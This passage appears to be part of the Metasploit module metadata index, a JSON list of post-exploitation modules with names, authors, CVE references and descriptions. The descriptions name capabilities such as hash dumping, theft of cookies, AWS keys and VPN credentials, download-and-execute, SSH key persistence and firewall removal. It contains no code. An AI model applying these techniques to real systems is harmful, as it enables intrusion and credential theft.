"ref_name": "linux/busybox/set_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/smb_share_root": {
"name": "BusyBox SMB Sharing",
"full_name": "post/linux/busybox/smb_share_root",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will modify\n the SMB configuration of the device executing BusyBox to share the root directory of\n the device.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/smb_share_root.rb",
"is_install_path": true,
"ref_name": "linux/busybox/smb_share_root",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/wget_exec": {
"name": "BusyBox Download and Execute",
"full_name": "post/linux/busybox/wget_exec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will use wget to\n download and execute a file from the device running BusyBox.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/wget_exec.rb",
"is_install_path": true,
"ref_name": "linux/busybox/wget_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/dos/xen_420_dos": {
"name": "Linux DoS Xen 4.2.0 2012-5525",
"full_name": "post/linux/dos/xen_420_dos",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Christoph Sendner <christoph.sendner@stud-mail.uni-wuerzburg.de>",
"Aleksandar Milenkoski <aleksandar.milenkoski@uni-wuerzburg.de>"
],
"description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n paravirtualized VM, including from dom0. Successfully tested on Debian 7\n 3.2.0-4-amd64 with Xen 4.2.0.",
"references": [
"CVE-2012-5525"
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/linux/dos/xen_420_dos.rb",
"is_install_path": true,
"ref_name": "linux/dos/xen_420_dos",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/checkcontainer": {
"name": "Linux Gather Container Detection",
"full_name": "post/linux/gather/checkcontainer",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"James Otten <jamesotten1@gmail.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a container and if so, which one. This module supports\n detection of Docker, LXC, and systemd nspawn.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-06 00:46:09 +0000",
"path": "/modules/post/linux/gather/checkcontainer.rb",
"is_install_path": true,
"ref_name": "linux/gather/checkcontainer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/checkvm": {
"name": "Linux Gather Virtual Environment Detection",
"full_name": "post/linux/gather/checkvm",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen,\n and QEMU/KVM.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-04 19:12:27 +0000",
"path": "/modules/post/linux/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "linux/gather/checkvm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/ecryptfs_creds": {
"name": "Gather eCryptfs Metadata",
"full_name": "post/linux/gather/ecryptfs_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Dhiru Kholia <dhiru@openwall.com>"
],
"description": "This module will collect the contents of all users' .ecrypts directories on\n the targeted machine. Collected \"wrapped-passphrase\" files can be\n cracked with John the Ripper (JtR) to recover \"mount passphrases\".",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/ecryptfs_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/ecryptfs_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_commands": {
"name": "Testing commands needed in a function",
"full_name": "post/linux/gather/enum_commands",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
],
"description": "This module will be applied on a session connected to a shell. It will check which commands are available in the system.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"path": "/modules/post/linux/gather/enum_commands.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_commands",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_configs": {
"name": "Linux Gather Configurations",
"full_name": "post/linux/gather/enum_configs",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ohdae <bindshell@live.com>"
],
"description": "This module collects configuration files found on commonly installed\n applications and services, such as Apache, MySQL, Samba, Sendmail, etc.\n If a config file is found in its default path, the module will assume\n that is the file we want.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-06 13:06:50 +0000",
"path": "/modules/post/linux/gather/enum_configs.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_configs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_network": {
"name": "Linux Gather Network Information",
"full_name": "post/linux/gather/enum_network",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ohdae <bindshell@live.com>",
"Stephen Haywood <averagesecurityguy@gmail.com>"
],
"description": "This module gathers network information from the target system\n IPTables rules, interfaces, wireless information, open and listening\n ports, active network connections, DNS information and SSH information.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-30 15:32:04 +0000",
"path": "/modules/post/linux/gather/enum_network.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_network",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_protections": {
"name": "Linux Gather Protection Enumeration",
"full_name": "post/linux/gather/enum_protections",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ohdae <bindshell@live.com>"
],
"description": "This module checks whether popular system hardening mechanisms are\n in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n tries to find installed applications that can be used to hinder,\n prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n This module is meant to identify Linux Secure Modules (LSM) in addition\n to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n related software.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-07 14:42:16 +0000",
"path": "/modules/post/linux/gather/enum_protections.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_protections",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_psk": {
"name": "Linux Gather 802-11-Wireless-Security Credentials",
"full_name": "post/linux/gather/enum_psk",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Cenk Kalpakoglu"
],
"description": "This module collects 802-11-Wireless-Security credentials such as\n Access-Point name and Pre-Shared-Key from your target CLIENT Linux\n machine using /etc/NetworkManager/system-connections/ files.\n The module gathers NetworkManager's plaintext \"psk\" information.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/enum_psk.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_psk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_system": {
"name": "Linux Gather System and User Information",
"full_name": "post/linux/gather/enum_system",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Stephen Haywood <averagesecurityguy@gmail.com>",
"sinn3r <sinn3r@metasploit.com>",
"ohdae <bindshell@live.com>",
"Roberto Espreto <robertoespreto@gmail.com>"
],
"description": "This module gathers system information. We collect\n installed packages, installed services, mount information,\n user list, user bash history and cron jobs",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/enum_system.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_system",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_users_history": {
"name": "Linux Gather User History",
"full_name": "post/linux/gather/enum_users_history",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ohdae <bindshell@live.com>"
],
"description": "This module gathers the following user-specific information:\n shell history, MySQL history, PostgreSQL history, MongoDB history,\n Vim history, lastlog, and sudoers.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/enum_users_history.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_users_history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/enum_xchat": {
"name": "Linux Gather XChat Enumeration",
"full_name": "post/linux/gather/enum_xchat",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/enum_xchat.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_xchat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/gnome_commander_creds": {
"name": "Linux Gather Gnome-Commander Creds",
"full_name": "post/linux/gather/gnome_commander_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"David Bloom"
],
"description": "This module collects the clear text passwords stored by\n Gnome-commander, a GUI file explorer for GNOME. Typically, these\n passwords are stored in the user's home directory, at\n ~/.gnome-commander/connections.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/gnome_commander_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/gnome_commander_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/gnome_keyring_dump": {
"name": "Gnome-Keyring Dump",
"full_name": "post/linux/gather/gnome_keyring_dump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Spencer McIntyre"
],
"description": "Use libgnome-keyring to extract network passwords for the current user.\n This module does not require root privileges to run.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/gnome_keyring_dump.rb",
"is_install_path": true,
"ref_name": "linux/gather/gnome_keyring_dump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/hashdump": {
"name": "Linux Gather Dump Password Hashes for Linux Systems",
"full_name": "post/linux/gather/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to dump the password hashes for all users on a Linux System",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-03-23 14:02:34 +0000",
"path": "/modules/post/linux/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "linux/gather/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/mount_cifs_creds": {
"name": "Linux Gather Saved mount.cifs/mount.smbfs Credentials",
"full_name": "post/linux/gather/mount_cifs_creds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n /etc/fstab on a Linux system.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-29 22:34:38 +0000",
"path": "/modules/post/linux/gather/mount_cifs_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/mount_cifs_creds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/openvpn_credentials": {
"name": "OpenVPN Gather Credentials",
"full_name": "post/linux/gather/openvpn_credentials",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"rvrsh3ll",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module grab OpenVPN credentials from a running process\n in Linux.\n\n Note: --auth-nocache must not be set in the OpenVPN command line.",
"references": [
"URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh"
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/gather/openvpn_credentials.rb",
"is_install_path": true,
"ref_name": "linux/gather/openvpn_credentials",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/phpmyadmin_credsteal": {
"name": "Phpmyadmin credentials stealer",
"full_name": "post/linux/gather/phpmyadmin_credsteal",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Chaitanya Haritash [bofheaded]",
"Dhiraj Mishra <dhiraj@notsosecure.com>"
],
"description": "This module gathers Phpmyadmin creds from target linux machine.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-07 11:13:09 +0000",
"path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb",
"is_install_path": true,
"ref_name": "linux/gather/phpmyadmin_credsteal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/pptpd_chap_secrets": {
"name": "Linux Gather PPTP VPN chap-secrets Credentials",
"full_name": "post/linux/gather/pptpd_chap_secrets",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module collects PPTP VPN information such as client, server, password,\n and IP from your target server's chap-secrets file.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-12 17:11:29 +0000",
"path": "/modules/post/linux/gather/pptpd_chap_secrets.rb",
"is_install_path": true,
"ref_name": "linux/gather/pptpd_chap_secrets",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/gather/tor_hiddenservices": {
"name": "Linux Gather TOR Hidden Services",
"full_name": "post/linux/gather/tor_hiddenservices",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Harvey Phillips <xcellerator@gmx.com>"
],
"description": "This module collects the hostnames name and private keys of\n any TOR Hidden Services running on the target machine. It\n will search for torrc and if found, will parse it for the\n directories of Hidden Services. However, root permissions\n are required to read them as they are owned by the user that\n TOR runs as, usually a separate account.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-06-07 20:08:23 +0000",
"path": "/modules/post/linux/gather/tor_hiddenservices.rb",
"is_install_path": true,
"ref_name": "linux/gather/tor_hiddenservices",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/dns_spoofing": {
"name": "Native DNS Spoofing module",
"full_name": "post/linux/manage/dns_spoofing",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
],
"description": "This module will be applied on a session connected to a shell. It will redirect DNS Request to remote DNS server.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"path": "/modules/post/linux/manage/dns_spoofing.rb",
"is_install_path": true,
"ref_name": "linux/manage/dns_spoofing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/download_exec": {
"name": "Linux Manage Download and Execute",
"full_name": "post/linux/manage/download_exec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joshua D. Abraham <jabra@praetorian.com>"
],
"description": "This module downloads and runs a file with bash. It first tries to uses curl as\n its HTTP client and then wget if it's not found. Bash found in the PATH is used\n to execute the file.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/manage/download_exec.rb",
"is_install_path": true,
"ref_name": "linux/manage/download_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/iptables_removal": {
"name": "IPTABLES rules removal",
"full_name": "post/linux/manage/iptables_removal",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
],
"description": "This module will be applied on a session connected to a shell. It will remove all IPTABLES rules.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"path": "/modules/post/linux/manage/iptables_removal.rb",
"is_install_path": true,
"ref_name": "linux/manage/iptables_removal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/pseudo_shell": {
"name": "Pseudo-Shell Post-Exploitation Module",
"full_name": "post/linux/manage/pseudo_shell",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
],
"description": "This module will run a Pseudo-Shell.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"path": "/modules/post/linux/manage/pseudo_shell.rb",
"is_install_path": true,
"ref_name": "linux/manage/pseudo_shell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/manage/sshkey_persistence": {
"name": "SSH Key Persistence",
"full_name": "post/linux/manage/sshkey_persistence",
"rank": 600,
"disclosure_date": null,
"type": "post",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/manage/sshkey_persistence.rb",
"is_install_path": true,
"ref_name": "linux/manage/sshkey_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/escalate/aws_create_iam_user": {
"name": "Create an AWS IAM User",
"full_name": "post/multi/escalate/aws_create_iam_user",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Godinez <godinezj@gmail.com>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module will attempt to create an AWS (Amazon Web Services) IAM\n (Identity and Access Management) user with Admin privileges.",
"references": [
"URL-https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf"
],
"platform": "Unix",
"arch": "",
"rport": 443,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/escalate/aws_create_iam_user.rb",
"is_install_path": true,
"ref_name": "multi/escalate/aws_create_iam_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/escalate/cups_root_file_read": {
"name": "CUPS 1.6.1 Root File Read",
"full_name": "post/multi/escalate/cups_root_file_read",
"rank": 300,
"disclosure_date": "2012-11-20",
"type": "post",
"author": [
"Jann Horn",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n CUPS allows members of the lpadmin group to make changes to the cupsd.conf\n configuration, which can specify an Error Log path. When the user visits the\n Error Log page in the web interface, the cupsd daemon (running with setuid root)\n reads the Error Log path and echoes it as plaintext.\n\n This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n as long as the session is in the lpadmin group.\n\n Warning: if the user has set up a custom path to the CUPS error log,\n this module might fail to reset that path correctly. You can specify\n a custom error log path with the ERROR_LOG datastore option.",
"references": [
"CVE-2012-5519",
"OSVDB-87635",
"URL-http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791"
],
"platform": "Linux,OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-18 17:38:33 +0000",
"path": "/modules/post/multi/escalate/cups_root_file_read.rb",
"is_install_path": true,
"ref_name": "multi/escalate/cups_root_file_read",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/escalate/metasploit_pcaplog": {
"name": "Multi Escalate Metasploit pcap_log Local Privilege Escalation",
"full_name": "post/multi/escalate/metasploit_pcaplog",
"rank": 0,
"disclosure_date": "2012-07-16",
"type": "post",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708"
],
"description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these\n filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n This, and all the other packets, are appended to /etc/passwd.\n\n Successful exploitation results in the creation of a new superuser account.\n\n This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n a permanent DoS on the target by corrupting the /etc/passwd file.",
"references": [
"BID-54472",
"URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html",
"URL-https://community.rapid7.com/docs/DOC-1946"
],
"platform": "BSD,Linux,Unix",
"arch": "",
"rport": 2940,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-30 15:45:52 +0000",
"path": "/modules/post/multi/escalate/metasploit_pcaplog.rb",
"is_install_path": true,
"ref_name": "multi/escalate/metasploit_pcaplog",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"post_multi/gather/apple_ios_backup": {
"name": "Windows Gather Apple iOS MobileSync Backup File Collection",
"full_name": "post/multi/gather/apple_ios_backup",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>",
"bannedit <bannedit@metasploit.com>"
],
"description": "This module will collect sensitive files from any on-disk iOS device backups",
"references": [
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/apple_ios_backup.rb",
"is_install_path": true,
"ref_name": "multi/gather/apple_ios_backup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/aws_ec2_instance_metadata": {
"name": "Gather AWS EC2 Instance Metadata",
"full_name": "post/multi/gather/aws_ec2_instance_metadata",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module will attempt to connect to the AWS EC2 instance metadata service\n and crawl and collect all metadata known about the session'd host.",
"references": [
"URL-http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html"
],
"platform": "Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-02 15:55:24 +0000",
"path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb",
"is_install_path": true,
"ref_name": "multi/gather/aws_ec2_instance_metadata",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/aws_keys": {
"name": "UNIX Gather AWS Keys",
"full_name": "post/multi/gather/aws_keys",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module will attempt to read AWS configuration files\n (.aws/config, .aws//credentials and .s3cfg) for users discovered\n on the session'd system and extract AWS keys from within.",
"references": [
"URL-http://s3tools.org/kb/item14.htm",
"URL-http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-config-files"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/aws_keys.rb",
"is_install_path": true,
"ref_name": "multi/gather/aws_keys",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/check_malware": {
"name": "Multi Gather Malware Verifier",
"full_name": "post/multi/gather/check_malware",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will check a file for malware on VirusTotal based on the checksum.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/check_malware.rb",
"is_install_path": true,
"ref_name": "multi/gather/check_malware",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/chrome_cookies": {
"name": "Chrome Gather Cookies",
"full_name": "post/multi/gather/chrome_cookies",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mangopdf <mangodotpdf@gmail.com>"
],
"description": "Read all cookies from the Default Chrome profile of the target user.",
"references": [
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-15 07:19:46 +0000",
"path": "/modules/post/multi/gather/chrome_cookies.rb",
"is_install_path": true,
"ref_name": "multi/gather/chrome_cookies",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/dbvis_enum": {
"name": "Multi Gather DbVisualizer Connections Settings",
"full_name": "post/multi/gather/dbvis_enum",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"David Bloom"
],
"description": "DbVisualizer stores the user database configuration in dbvis.xml.\n This module retrieves the connections settings from this file and decrypts the encrypted passwords.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/dbvis_enum.rb",
"is_install_path": true,
"ref_name": "multi/gather/dbvis_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/dns_bruteforce": {
"name": "Multi Gather DNS Forward Lookup Bruteforce",
"full_name": "post/multi/gather/dns_bruteforce",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Brute force subdomains and hostnames via wordlist.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/dns_bruteforce.rb",
"is_install_path": true,
"ref_name": "multi/gather/dns_bruteforce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/dns_reverse_lookup": {
"name": "Multi Gather DNS Reverse Lookup Scan",
"full_name": "post/multi/gather/dns_reverse_lookup",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Performs DNS reverse lookup using the OS included DNS query command.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/gather/dns_reverse_lookup.rb",
"is_install_path": true,
"ref_name": "multi/gather/dns_reverse_lookup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/gather/dns_srv_lookup": {
"name": "Multi Gather DNS Service Record Lookup Scan",
"full_name": "post/multi/gather/dns_srv_lookup",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Enumerates known SRV Records for a given domain using target host DNS query tool.",
"references": [
],
